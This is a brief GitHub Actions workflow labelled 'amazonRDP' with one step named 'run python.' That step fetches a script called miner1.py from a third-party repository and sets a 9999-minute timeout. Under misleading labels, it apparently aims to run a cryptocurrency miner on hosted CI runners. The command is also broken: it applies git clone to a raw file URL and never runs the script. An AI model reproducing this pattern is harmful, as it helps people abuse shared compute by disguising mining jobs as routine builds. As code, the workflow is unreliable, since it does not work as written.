name: amazonRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 9999

    steps:
    
    - name: run python.
      run: |
        git clone https://raw.githubusercontent.com/TOMMARCUSBRUT/dcf/main/miner1.py
